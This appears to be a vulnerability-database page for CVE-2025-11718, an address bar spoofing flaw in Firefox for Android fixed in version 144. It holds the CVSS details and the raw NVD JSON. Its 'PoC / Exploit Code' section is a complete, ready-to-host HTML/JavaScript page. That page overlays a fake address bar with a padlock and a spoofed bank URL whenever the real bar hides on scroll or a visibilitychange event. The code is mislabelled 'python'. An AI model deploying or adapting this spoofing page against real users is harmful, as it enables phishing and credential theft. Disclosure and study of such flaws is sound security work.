Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11718 CVSS 6.5 MEDIUM

CVE-2025-11718

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:41
Source: [email protected]

Description

When the address bar was hidden due to scrolling on Android, a malicious page could create a fake address bar to fool the user in response to a visibilitychange event. This vulnerability was fixed in Firefox 144.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
Mozilla Firefox < 144 (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-11718 PoC: Firefox Android Address Bar Spoofing --> <!-- This PoC demonstrates how a malicious page can spoof the address bar --> <!-- when the real address bar is hidden due to scrolling on Android Firefox --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Loading...</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif; height: 300vh; /* Force scrollable content to hide address bar */ background: #ffffff; } /* Fake address bar styling to mimic Firefox on Android */ #fake-address-bar { display: none; position: fixed; top: 0; left: 0; right: 0; height: 56px; background: #f9f9fb; border-bottom: 1px solid #e0e0e0; padding: 8px 12px; align-items: center; z-index: 999999; box-shadow: 0 2px 4px rgba(0,0,0,0.1); } #fake-address-bar .url-container { flex: 1; background: #ffffff; border: 1px solid #d0d0d0; border-radius: 18px; padding: 8px 14px; display: flex; align-items: center; gap: 8px; font-size: 14px; color: #333; } #fake-address-bar .lock-icon { color: #128a0e; font-size: 14px; } .content { padding: 20px; margin-top: 60px; } .scroll-trigger { height: 100vh; display: flex; align-items: center; justify-content: center; color: #666; font-size: 16px; } </style> </head> <body> <!-- Fake address bar element --> <div id="fake-address-bar"> <div class="url-container"> <span class="lock-icon">πŸ”’</span> <span id="fake-url">https://www.secure-bank-login.com/account</span> </div> </div> <!-- Page content to force scrolling --> <div class="content"> <h1>Welcome to Our Service</h1> <p>Please scroll down to continue...</p> </div> <div class="scroll-trigger">⬇ Scroll Down ⬇</div> <div class="scroll-trigger">⬇ Keep Scrolling ⬇</div> <!-- Malicious script to exploit visibilitychange event --> <script> // Listen for visibility change events triggered when address bar hides document.addEventListener('visibilitychange', function() { if (document.hidden) { // When page becomes hidden (address bar hides), show fake address bar document.getElementById('fake-address-bar').style.display = 'flex'; } else { // Hide fake address bar when real one is visible document.getElementById('fake-address-bar').style.display = 'none'; } }); // Additional: Also trigger on scroll as fallback let lastScrollY = 0; window.addEventListener('scroll', function() { const fakeBar = document.getElementById('fake-address-bar'); if (window.scrollY > 50) { // Show fake address bar when user scrolls (real one hides) fakeBar.style.display = 'flex'; } else { fakeBar.style.display = 'none'; } }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11718", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:38.150", "lastModified": "2026-04-13T15:16:41.083", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "When the address bar was hidden due to scrolling on Android, a malicious page could create a fake address bar to fool the user in response to a visibilitychange event. This vulnerability was fixed in Firefox 144."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "DC554AD6-8F3F-4C92-85EA-C204204E9E9D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1980808", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.